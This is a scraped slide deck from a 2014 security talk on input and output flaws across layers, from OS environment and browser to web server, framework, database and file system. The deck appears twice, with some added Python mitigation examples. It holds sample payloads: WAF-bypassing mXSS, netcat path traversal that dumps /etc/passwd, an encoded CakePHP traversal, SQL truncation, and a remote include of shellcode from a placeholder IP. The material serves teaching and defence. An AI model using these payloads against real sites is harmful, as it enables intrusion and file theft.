Vulnerabilities in data processing layers
Omar Ganiev
PHDays 2014
Moscow
whoami
• Beched (ahack.ru, @ahack_ru)
• Math student
• RDot.Org (CTF) team
• Penetration testing expert at IncSecurity
Intro
• An application's behaviour is defined not only by its code, but also by plenty of external factors such as its environment
• We'll try to dig into the different layers of data processing and point out the potential dangers which are often ignored by developers
Program? Turing machine!
Real program
• A lot of inputs
• User supplied input
• Operating system environment
• Hardware
• We'll talk about the general situation and pay specific attention to web applications
Web application interaction
Browser → Web server → Application
Web application interaction
Browser → Web server → Framework → Application → Database
Request processing layers
• Hardware
• Operating system
• Browser
• Network
• Web server
• Framework
• Application
• Database
• File system
Request processing layers
• In the general case: Hardware, OS, Client, Network, Server
Data processing
• Each layer has some inputs and outputs
• Each input and output is somehow processed, normalized, filtered, etc.
• Developers often consider only the user inputs which are explicitly defined in the code
• Another problem is that the output often contains sensitive information which is then used as an input for some functions
Input/output trust
• Which input can be trusted, and which one is user-controlled?
• Which input is secret, and which one is contained in the output?
• This is not always clear
• Let's observe each abstract layer and look at input and output processing weaknesses
Hardware layer
• Input from the pseudo devices /dev/random, /dev/urandom in Linux is not always safe, see http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Gutterman.pdf
• The speed of system clock quartz crystals depends on the temperature. This creates a side channel (clock skew) for attacking anonymity systems: http://www.cl.cam.ac.uk/~sjm217/papers/ccs06hotornot.pdf
• Cryptanalysis via various physical side channels
Operating system layer
• int main() { system("id"); }
• Safe? No! There are no inputs in the application, but there are inputs in the environment
• PATH=.:$PATH
• Put shellcode in ./id and run the executable
• Real-world example: CVE-2013-1662, unsafe popen of the lsb_release file in the suid vmware-mount binary
Operating system layer
• External libraries provide another input point
• This results in such attacks as DLL injection and hooking
• CreateRemoteThread, SetWindowsHookEx, etc. in Windows
• LD_PRELOAD in Linux
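The two slides above describe the same root cause: a program that spawns a helper inherits PATH and the dynamic-loader variables from whoever launched it. The following is an added example (not code from the talk) showing, in Python, the checks a privileged helper should apply before it executes anything: detect a PATH entry that resolves relative to the current directory, drop loader variables such as LD_PRELOAD, and exec the helper by absolute path with a fixed environment. TRUSTED_PATH and the allow-list of inherited variables are assumptions for this example.

```python
import os
import subprocess

# Directories a privileged helper is allowed to search. Constructed for
# this example; adapt to the deployment.
TRUSTED_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"

# Variables that change how the dynamic loader resolves libraries: the
# LD_PRELOAD-style input the slides mention.
LOADER_VARS = ("LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT")

# Variables that are harmless to inherit (assumption for the example).
INHERITABLE = ("LANG", "TZ")


def path_has_relative_entry(path_value):
    """True if PATH contains an entry that is resolved relative to the cwd.

    An empty entry ("/usr/bin::/bin", a leading or a trailing ':') means
    the current directory, exactly like an explicit '.', so it is flagged too.
    """
    return any(not entry.startswith("/") for entry in path_value.split(":"))


def loader_vars_present(env):
    """Names of loader-controlling variables found in the given environment."""
    return sorted(name for name in LOADER_VARS if name in env)


def clean_env(base_env):
    """Build the environment a privileged helper should run with.

    Nothing outside a short allow-list is inherited, PATH is replaced by
    trusted directories, and loader variables can never slip through.
    """
    env = {k: v for k, v in base_env.items() if k in INHERITABLE}
    env["PATH"] = TRUSTED_PATH
    return env


def run_id(base_env=None):
    """What the slide's system("id") should have been: absolute path,
    sanitized environment, no shell involved."""
    env = clean_env(os.environ if base_env is None else base_env)
    result = subprocess.run(["/usr/bin/id"], env=env, capture_output=True,
                            text=True, check=True)
    return result.stdout.strip()


if __name__ == "__main__":
    current = dict(os.environ)
    if path_has_relative_entry(current.get("PATH", "")):
        print("warning: PATH contains a relative entry")
    for name in loader_vars_present(current):
        print(f"warning: {name} is set and would be dropped")
    print(run_id(current))
```

The point of the split into small functions is that the detection part (path_has_relative_entry, loader_vars_present) can be reused in a startup self-check or a log-based detection rule, while clean_env is what actually removes the environment as an input.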
Browser layer
• The browser performs a lot of transformations of the data
• The purpose of these transformations is standards compliance (RFC, W3C)
• The transformations are often done after the input validation performed by the web application
• Breaking standards leads to various client-side attacks
Browser layer
• XSS, UI redressing, URL spoofing, HTTP response splitting, open redirects via a single HTTP parameter – Request-path: https://rdot.org/forum/showthread.php?t=2596 (by @black2fan)
• Browsers incorrectly treat the Location response header and inject malicious data into the Request-path
Browser layer
• Mutated XSS (mXSS) is an attack on the output
• Browsers turn invalid HTML pages into some canonical form
• The transformations can be quite weird: https://cure53.de/fp170.pdf
• More examples:
<listing>&lt;img src=1 onerror=alert(1)&gt;</listing>
<img src= alt=" onerror=alert(1);//">
• Try at http://html5sec.org/innerhtml/
Browser layer
• All the checks and input validation are typically done on the server side
• Hence, mXSS can bypass such checks and the WAF
• Consider a signature-based filter (for example, in the Bitrix CMS)
• We can encode the bad words in the following mXSS payload for IE:
<listing>&lt;img src=1 o&#x6e;error=alert(1)&gt;</listing>
• This is rendered into <img src=1 onerror=alert(1)> and bypasses the WAF
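The filter on this slide fails because it matches signatures against the bytes it received, while the browser matches the bytes it produces after decoding. As an added example (not from the talk), the Python below runs a naive signature rule over the slide's payload, then runs the same rule after an approximation of the browser's canonicalization (repeated character-reference decoding and whitespace collapsing). The canonicalize function is a deliberately simple heuristic of my own; it is not a model of any browser's serializer.

```python
import html
import re

# A naive signature: an inline event handler attribute such as onerror=.
EVENT_HANDLER = re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)

# The payload from the slide, reproduced here as the sample input.
MXSS_PAYLOAD = '<listing>&lt;img src=1 o&#x6e;error=alert(1)&gt;</listing>'


def naive_filter(fragment):
    """Signature match on the raw request body, as a simple WAF rule does."""
    return bool(EVENT_HANDLER.search(fragment))


def canonicalize(fragment, rounds=3):
    """Approximate what the browser will act on: decode character references
    until a fixed point (decoding can expose further references), then
    collapse whitespace runs. Heuristic only; a real sanitizer must operate
    on the parsed DOM, not on text."""
    prev, cur = None, fragment
    for _ in range(rounds):
        if cur == prev:
            break
        prev, cur = cur, html.unescape(cur)
    return re.sub(r"\s+", " ", cur)


def canonical_filter(fragment):
    """The same signature, applied after canonicalization: formatting first,
    validation second, as the talk's closing rule puts it."""
    return bool(EVENT_HANDLER.search(canonicalize(fragment)))


if __name__ == "__main__":
    print("raw match:      ", naive_filter(MXSS_PAYLOAD))
    print("canonical form: ", canonicalize(MXSS_PAYLOAD))
    print("canonical match:", canonical_filter(MXSS_PAYLOAD))
```

Decoding before matching closes this particular gap, but it still treats HTML as a string; the robust fix for stored content is to parse it with an HTML parser and allow-list elements and attributes on the resulting tree, and to re-serialize from that tree rather than echoing the original bytes.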
Network layer
• TCP timestamps can reveal various information (see the Hardware layer)
• Network administrators often forget about internal recursive DNS servers, which makes it possible to transfer data through a DNS tunnel, bypassing firewalls
Web server layer
• The HTTP daemon should verify the validity of incoming requests
• Fields should meet the RFC rules
• But can one assume that this is the case and trust any HTTP header field?
• No! Apache is a typical example of software which breaks the rules
Web server layer
• Let’s discover Apache magic
$ echo a | nc localhost 80
• 400 error? Nope, the index page is loaded. Note this:
["SERVER_PROTOCOL"]=>
string(8) "HTTP/0.9"
["REQUEST_METHOD"]=>
string(1) "a"
["QUERY_STRING"]=>
string(0) ""
["REQUEST_URI"]=>
string(0) ""
Web server layer
• Often $_SERVER['REQUEST_URI'] is used in file inclusion; can we perform a path traversal (not in QUERY_STRING)? Example:
<?php
$docroot = $_SERVER['DOCUMENT_ROOT'];
$url = explode('?', $_SERVER['REQUEST_URI']);
$path = substr($url[0], 1); // assumes REQUEST_URI always starts with '/'
$parts = explode('/', $path);
if($parts[0] == 'assets') {
    readfile("$docroot/$path"); // the first segment is checked, the rest is not
    exit();
}
Web server layer
• Okay, let's try:
$ echo 'GET /../../../../../etc/passwd' | nc localhost 80
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
Web server layer
• Here comes the double-slash magic:
$ echo -e 'GET xassets/../../..//etc/passwd' | nc localhost 80
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
…
• Clearly, this should not work, but it works. You should not trust the web server's data processing!
Web server layer
• Similar constructions are often used in MVC projects to parse the controller and action values. Example from an article in Xakep magazine (167):
$piecesOfUrl = explode('/', $_SERVER['REQUEST_URI']);
…
$controllerName = $piecesOfUrl[1];
…
include $fileWithControllerPath;
Web server layer
• Looks secure, but what if someone runs this on a Windows box with Apache?
• The following payload will then include myfile.php:
GET a/................myfile/..//
• There are lots of such code snippets on GitHub (vulnerable to file inclusion via REQUEST_URI, not necessarily under Windows)
Web server layer
• The Host header is also untrustworthy, since the usage of $_SERVER['HTTP_HOST'] can lead to logical vulnerabilities
• For instance, spoofing of the password reset link
• See http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html
Web server layer
• This was all about input. What about output?
• Web servers reveal the current server time (Date header) and static files' modification time (Last-Modified header)
• This can be used to predict the PRNG seed in PHP (together with the PHPSESSID cookie value): http://habrahabr.ru/company/pt/blog/149746/
Web server layer
• Also consider the following code:
function genid() {
    mt_srand(time()); // seeded from the server clock, which the Date header reveals
    $h = fopen('entropy', 'r');
    $fstat = fstat($h);
    fclose($h);
    return md5(mt_rand() . $fstat['atime'] . $fstat['mtime']);
}
• An id generated by such a function is insecure: an attacker can obtain mtime from the Last-Modified header, and atime by accessing the 'entropy' file and reading the Date header
Framework layer
• Do not always trust frameworks! Not every method is secure; read the source code and the documentation
• Insecure Ruby on Rails methods: http://rails-sqli.org/
• A rather popular Yii class with a lot of find*() methods without SQL injection protection: https://github.com/yiisoft/yii/blob/master/framework/db/ar/CActiveRecord.php
Framework layer
• Example of insecure data processing inside the CakePHP framework: http://www.securityfocus.com/archive/1/527974/30/0/threaded
• The data (the PATH_INFO variable) is first validated and then decoded, thus it's possible to bypass the check:
/theme/Test1/%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e./etc/passwd
Database layer
• A DBMS stores data in fields with a particular format (VARCHAR, BLOB, TEXT, INT, etc.)
• Each format has its own limitations, thus the input data is transformed: trimmed or truncated
• An SQL column truncation attack can lead to the compromise of any user account in the system:
INSERT INTO `users` VALUES ('admin x', 'password');
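The INSERT on this slide works because the application checks the value it received, while the database stores a different value: one that has been cut to the column width and, under a PAD SPACE collation, compares equal to an existing username. The following is an added example (not from the talk) that models that behaviour in Python so the whole sequence can be run offline: UsersTable is a constructed stand-in for a MySQL-style VARCHAR(16) column in non-strict mode (silent truncation, trailing spaces ignored on comparison) and no unique index; it is not a database driver. The example assumes the slide's 'admin x' stands for "admin" followed by enough spaces to push the 'x' past the column width.

```python
USERNAME_LEN = 16   # VARCHAR(16), an assumption for the example


class UsersTable:
    """Constructed model of a users table with MySQL-like semantics."""

    def __init__(self):
        self.rows = []  # (username as stored, password)

    @staticmethod
    def _store(value):
        # Non-strict mode: values longer than the column are silently cut.
        return value[:USERNAME_LEN]

    @staticmethod
    def _eq(a, b):
        # PAD SPACE collation: trailing spaces are ignored when comparing.
        return a.rstrip(" ") == b.rstrip(" ")

    def select_by_username(self, name):
        return [row for row in self.rows if self._eq(row[0], name)]

    def insert(self, name, password):
        self.rows.append((self._store(name), password))


def register_unsafe(table, name, password):
    """Existence check on the untruncated name, then INSERT. The value that
    is checked and the value that is stored are not the same string."""
    if table.select_by_username(name):
        return False
    table.insert(name, password)
    return True


def register_safe(table, name, password):
    """Validate the value before the DBMS gets a chance to transform it:
    enforce the column width and refuse leading/trailing whitespace. (Strict
    SQL mode plus a UNIQUE index on username is the matching server-side fix.)"""
    if len(name) > USERNAME_LEN or name != name.strip():
        return False
    return register_unsafe(table, name, password)


def login_rows(table, name):
    """Rows a login query WHERE username = ? would see for this name."""
    return table.select_by_username(name)


def demo():
    """Constructed scenario: an existing admin, then a second registration
    whose name truncates to 'admin' padded with spaces."""
    attacker_name = "admin" + " " * 11 + "x"   # 17 characters, 16 stored
    unsafe = UsersTable()
    unsafe.insert("admin", "s3cret")
    register_unsafe(unsafe, attacker_name, "pwned")
    safe = UsersTable()
    safe.insert("admin", "s3cret")
    register_safe(safe, attacker_name, "pwned")
    return len(login_rows(unsafe, "admin")), len(login_rows(safe, "admin"))


if __name__ == "__main__":
    unsafe_matches, safe_matches = demo()
    print(f"rows matching 'admin' at login: unsafe={unsafe_matches} safe={safe_matches}")
```

With the unsafe registration, a login query for 'admin' now matches two rows, one of which carries a password the attacker chose; the safe variant never lets the oversized name reach the INSERT.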
Database layer
• The PHP function addslashes can be bypassed: http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
• This is due to charset transformations, when the MySQL connection uses multi-byte charsets like BIG5 or GBK
File system layer
• In PHP there are a lot of weird file path normalization algorithms
• The FindFirstFile WinAPI function allows passing wildcards instead of exact paths to the include functions under Windows: https://rdot.org/forum/showthread.php?t=926
• For example, this will include C:\boot.ini:
include 'C:<oot"<<';
File system layer
• In old versions of PHP:
/etc/passwd///[x4096]///.php = /etc/passwd ;
/etc/passwd///// = /etc/passwd
• open_basedir bypass via the glob wrapper: http://ahack.ru/bugs/php-vulnerabilities-exploits.htm
• The path glob://… is first treated as relative and only then converted into a URL
File system layer
• allow_url_include and allow_url_fopen bypass via a UNC path:
include '//IP/path/shellcode.txt';
• The security checks are performed before the transformation into a remote UNC path
Outro
• Interaction with a program goes through different layers, and each layer has its own parameters and data processing rules
• The rule: first formatting, then validation
• Each variable which is not explicitly set in the code should be treated as a potential source of malicious data
Thanks for attention!
Questions?
admin@ahack.ru
beched@incsecurity.ru

 
Strategies for using alternative queries to mitigate zero results
Strategies for using alternative queries to mitigate zero resultsStrategies for using alternative queries to mitigate zero results
Strategies for using alternative queries to mitigate zero results
 
Machine Learning Software Engineering Patterns and Their Engineering
Machine Learning Software Engineering Patterns and Their EngineeringMachine Learning Software Engineering Patterns and Their Engineering
Machine Learning Software Engineering Patterns and Their Engineering
 
Amazon Bedrock in Action - presentation of the Bedrock's capabilities
Amazon Bedrock in Action - presentation of the Bedrock's capabilitiesAmazon Bedrock in Action - presentation of the Bedrock's capabilities
Amazon Bedrock in Action - presentation of the Bedrock's capabilities
 
Salesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZSalesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZ
 
Leveraging AI for Mobile App Testing on Real Devices | Applitools + Kobiton
Leveraging AI for Mobile App Testing on Real Devices | Applitools + KobitonLeveraging AI for Mobile App Testing on Real Devices | Applitools + Kobiton
Leveraging AI for Mobile App Testing on Real Devices | Applitools + Kobiton
 
Revolutionizing the Digital Transformation Office - Leveraging OnePlan’s AI a...
Revolutionizing the Digital Transformation Office - Leveraging OnePlan’s AI a...Revolutionizing the Digital Transformation Office - Leveraging OnePlan’s AI a...
Revolutionizing the Digital Transformation Office - Leveraging OnePlan’s AI a...
 
Keeping your build tool updated in a multi repository world
Keeping your build tool updated in a multi repository worldKeeping your build tool updated in a multi repository world
Keeping your build tool updated in a multi repository world
 
Enhancing Supply Chain Visibility with Cargo Cloud Solutions.pdf
Enhancing Supply Chain Visibility with Cargo Cloud Solutions.pdfEnhancing Supply Chain Visibility with Cargo Cloud Solutions.pdf
Enhancing Supply Chain Visibility with Cargo Cloud Solutions.pdf
 
UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptxUI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
 
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptxThe Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
 
Powering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsPowering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data Streams
 
VictoriaMetrics Q1 Meet Up '24 - Community & News Update
VictoriaMetrics Q1 Meet Up '24 - Community & News UpdateVictoriaMetrics Q1 Meet Up '24 - Community & News Update
VictoriaMetrics Q1 Meet Up '24 - Community & News Update
 

Vulnerabilities in data processing layers across request handling

Hardware layer
• Input from the pseudo devices /dev/random and /dev/urandom in Linux is not always safe, see http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Gutterman.pdf
• The speed of system clock quartz crystals depends on the temperature. This creates a side channel (clock skew) for attacking anonymity systems: http://www.cl.cam.ac.uk/~sjm217/papers/ccs06hotornot.pdf
• Cryptanalysis via various physical side channels
Operating system layer
• #include <stdlib.h>
  int main() { system("id"); }
• Safe? No! There are no inputs in the application, but there are inputs in the environment
• PATH=.:$PATH
• Put shellcode in ./id and run the executable
• Real-world example: CVE-2013-1662, unsafe popen of the lsb_release file in the suid vmware-mount binary
Operating system layer
• External libraries provide another input point
• This results in such attacks as DLL injection and hooking
• CreateRemoteThread, SetWindowsHookEx, etc. in Windows
• LD_PRELOAD in Linux
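As an added example (not code from the talk), the mitigation for the two slides above in Python rather than C: the command is resolved only against a pinned PATH, and the loader variables (LD_PRELOAD and friends) are stripped before the child is spawned. TRUSTED_PATH and the helper names are this example's own assumptions.

```python
import os
import shutil
import subprocess

# Assumption for this example: the directories an application is willing to
# execute from. The caller's PATH (which may start with ".") is never consulted.
TRUSTED_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def sanitized_env(env):
    """Return a copy of `env` with the dynamic-loader injection variables
    (LD_PRELOAD, LD_LIBRARY_PATH, ...) removed and PATH pinned."""
    clean = {k: v for k, v in env.items() if not k.startswith("LD_")}
    clean["PATH"] = TRUSTED_PATH
    return clean


def trusted_command(name):
    """Resolve a bare command name against TRUSTED_PATH only.

    Refuses relative or absolute paths so that "./id" can never be passed in,
    and raises if the binary is not found in a trusted directory."""
    if "/" in name:
        raise ValueError("pass a bare command name, not a path")
    found = shutil.which(name, path=TRUSTED_PATH)
    if found is None:
        raise FileNotFoundError(f"{name!r} is not in the trusted PATH")
    return found


def run_trusted(name, *args):
    """The system("id") from the slide, with the environment treated as input:
    absolute executable, no shell, sanitized environment."""
    exe = trusted_command(name)
    result = subprocess.run([exe, *args], env=sanitized_env(os.environ),
                            capture_output=True, text=True, check=False)
    return result.returncode, result.stdout
```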
Browser layer
• The browser makes a lot of transformations of the data
• The purpose of the transformations is standards compliance (RFC, W3C)
• The transformations are often done after input validation by the web application
• Breaking standards leads to various client-side attacks
Browser layer
• XSS, UI redressing, URL spoofing, HTTP response splitting, open redirects via the single HTTP parameter Request-path: https://rdot.org/forum/showthread.php?t=2596 (by @black2fan)
• Browsers incorrectly treat the Location response header and inject malicious data into Request-path
Browser layer
• Mutated XSS (mXSS) is an attack on the output
• Browsers compile non-valid HTML pages into some canonical form
• The transformations can be quite weird: https://cure53.de/fp170.pdf
• More examples:
  <listing>&lt;img src=1 onerror=alert(1)&gt;</listing>
  <img src= alt=" onerror=alert(1);//">
• Try at http://html5sec.org/innerhtml/
Browser layer
• All the checks and input validation are typically done on the server side
• Hence, mXSS can bypass such checks and WAFs
• Consider a signature-based filter (for example, in CMS Bitrix)
• We can encode bad words in the following mXSS payload for IE:
  <listing>&lt;img src=1 o&#x6e;error=alert(1)&gt;</listing>
• This is rendered into <img src=1 onerror=alert(1)> and bypasses the WAF
Network layer
• TCP timestamps can reveal various information (see Hardware layer)
• Network administrators often forget about internal recursive DNS servers, which makes it possible to transfer data in a DNS tunnel, bypassing firewalls
Web server layer
• The HTTP daemon should verify the validity of the packets
• Fields should meet RFC rules
• But can one assume that this is the case and trust any HTTP header field?
• No! Apache is a typical example of software which breaks the rules
Web server layer
• Let's discover Apache magic:
  $ echo a | nc localhost 80
• 400 error? Nope, the index page is loaded. Note this:
  ["SERVER_PROTOCOL"]=> string(8) "HTTP/0.9"
  ["REQUEST_METHOD"]=> string(1) "a"
  ["QUERY_STRING"]=> string(0) ""
  ["REQUEST_URI"]=> string(0) ""
Web server layer
• Often $_SERVER['REQUEST_URI'] is used in file inclusion. Can we perform a path traversal (not in QUERY_STRING)? Example:
  <?php
  $docroot = $_SERVER['DOCUMENT_ROOT'];
  $url = explode('?', $_SERVER['REQUEST_URI']);
  $path = substr($url[0], 1);           // drops the first character, assumed to be '/'
  $parts = explode('/', $path);
  if($parts[0] == 'assets') {           // only the first segment is checked
      readfile("$docroot/$path");       // '..' and '//' in the rest are passed through
      exit();
  }
Web server layer
• Okay, let's try:
  $ echo 'GET /../../../../../etc/passwd' | nc localhost 80
  <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  <html><head>
  <title>400 Bad Request</title>
Web server layer
• Here comes double-slash magic:
  $ echo -e 'GET xassets/../../..//etc/passwd' | nc localhost 80
  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  …
• Clearly, this should not work, but it does. You should not trust the web server's data processing!
Web server layer
• Similar constructions are often used in MVC projects to parse the controller and action values. Example from the article in Xakep magazine (167):
  $piecesOfUrl = explode('/', $_SERVER['REQUEST_URI']);
  …
  $controllerName = $piecesOfUrl[1];
  …
  include $fileWithControllerPath;
Web server layer
• Looks secure, but what if someone launches this on a Windows box with Apache?
• The following payload will then include myfile.php:
  GET a/................myfile/..//
• There are lots of such code snippets on GitHub (vulnerable to file inclusion via REQUEST_URI, not necessarily under Windows)
Web server layer
• The Host header is also untrustworthy, since the usage of $_SERVER['HTTP_HOST'] can lead to logical vulnerabilities
• For instance, spoofing of the password restore link
• See http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html
Web server layer
• This was all about input. What about output?
• Web servers reveal the current server time (Date header) and static files' modification time (Last-Modified header)
• This can be used to predict the PRNG seed in PHP (using also the PHPSESSID cookie value): http://habrahabr.ru/company/pt/blog/149746/
Web server layer
• Also consider the following code:
  function genid() {
      mt_srand(time());
      $h = fopen('entropy', 'r');
      $fstat = fstat($h);
      fclose($h);
      return md5(mt_rand() . $fstat['atime'] . $fstat['mtime']);
  }
• An id generated by such a function is insecure: an attacker can obtain mtime from the Last-Modified header, and atime by accessing the 'entropy' file and reading the Date header
Framework layer
• Do not always trust frameworks! Not every method is secure; read the source code and documentation
• Insecure Ruby on Rails methods: http://rails-sqli.org/
• Rather popular Yii class with a lot of find*() methods without SQL injection protection: https://github.com/yiisoft/yii/blob/master/framework/db/ar/CActiveRecord.php
Framework layer
• Example of insecure data processing inside the CakePHP framework: http://www.securityfocus.com/archive/1/527974/30/0/threaded
• The data (PATH_INFO variable) is first validated and then decoded, thus it's possible to bypass the check:
  /theme/Test1/%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e./etc/passwd
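An added example (not code from the talk or from CakePHP) covering both the REQUEST_URI snippet on the "Web server layer" slides and the CakePHP decode-after-validate bug above: the vulnerable check is re-created next to a version that decodes and normalizes the path before validating it. DOCROOT and the function names are constructed for this example.

```python
import posixpath
from urllib.parse import unquote

DOCROOT = "/var/www/html"   # constructed document root for the example


def vulnerable_asset_path(request_uri):
    """Re-creates the slide's PHP logic: trust the first segment, then read the
    rest as-is. substr($url[0], 1) drops ONE character, whatever it is."""
    path = request_uri.split("?", 1)[0][1:]
    parts = path.split("/")
    if parts[0] == "assets":
        return f"{DOCROOT}/{path}"   # '..' and '//' survive into readfile()
    return None


def hardened_path(request_uri, allowed_prefix="/assets/"):
    """Format first, validate second: percent-decode, normalize, then check.

    Returns the file system path or None when the request must be rejected."""
    raw = request_uri.split("?", 1)[0]
    decoded = unquote(raw)              # CakePHP validated before this step
    if "\x00" in decoded or "%" in decoded:
        return None                     # NUL byte or double-encoded input
    # Anchor at "/" so normpath cannot climb above the root, then collapse
    # '.', '..' and repeated slashes before any decision is made.
    normalized = posixpath.normpath("/" + decoded.lstrip("/"))
    if not normalized.startswith(allowed_prefix):
        return None
    # Symlinks inside DOCROOT still need an os.path.realpath() check at open time.
    return DOCROOT + normalized
```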
Database layer
• A DBMS stores data in fields with a particular format (VARCHAR, BLOB, TEXT, INT, etc.)
• Each format has its own limitations; thus input data is transformed, trimmed or truncated
• A SQL column truncation attack can lead to the compromise of any user account in the system:
  INSERT INTO `users` VALUES ('admin x', 'password');
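An added example (not from the talk) that simulates the two database behaviours the column truncation attack relies on, silent truncation of over-long VARCHAR values on INSERT and trailing-space-insensitive (PAD SPACE) comparison, and contrasts a registration routine that trusts the database with one that validates against the column's limits first. The column width and the in-memory table are constructed for this example.

```python
USERNAME_LEN = 16   # constructed VARCHAR(16) width


def truncate_like_nonstrict_mysql(value):
    """Non-strict SQL mode: an over-long value is cut to the column width."""
    return value[:USERNAME_LEN]


def pad_space_equal(a, b):
    """PAD SPACE collation semantics: 'admin' and 'admin   ' compare equal."""
    return a.rstrip(" ") == b.rstrip(" ")


class UserTable:
    """Minimal stand-in for a users table with the semantics above."""

    def __init__(self):
        self.rows = []   # (username, password) tuples

    def find(self, username):
        return [r for r in self.rows if pad_space_equal(r[0], username)]

    def register_vulnerable(self, username, password):
        """Uniqueness is checked on the raw value; the DB then reshapes it."""
        if self.find(username):
            return False
        self.rows.append((truncate_like_nonstrict_mysql(username), password))
        return True

    def register_hardened(self, username, password):
        """Validate against the column's real limits before storing, so the
        value that is checked is exactly the value that is persisted."""
        if len(username) > USERNAME_LEN or username != username.strip():
            return False
        if self.find(username):
            return False
        self.rows.append((username, password))
        return True
```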
Database layer
• The PHP function addslashes can be bypassed: http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
• This is due to charset transformations, when the MySQL connection uses multi-byte charsets like BIG5 or GBK
File system layer
• In PHP there are a lot of weird file path normalization algorithms
• The FindFirstFile WinAPI method allows passing wildcards instead of exact paths to include functions under Windows: https://rdot.org/forum/showthread.php?t=926
• For example, this will include C:\boot.ini:
  include 'C:<oot"<<';
File system layer
• In old versions of PHP: /etc/passwd///[x4096]///.php = /etc/passwd ; /etc/passwd///// = /etc/passwd
• open_basedir bypass via the glob wrapper: http://ahack.ru/bugs/php-vulnerabilities-exploits.htm
• The path glob://… is first considered as relative and then is converted into a URL
File system layer
• allow_url_include and allow_url_fopen bypass via UNC path:
  include '//IP/path/shellcode.txt';
• Security checks are performed before the transformation into a remote UNC path
Outro
• Interaction with a program goes through different layers, and each layer has its own parameters and data processing rules
• The rule: first formatting, then validation
• Each variable which is not explicitly set in the code should be treated as a potential source of malicious data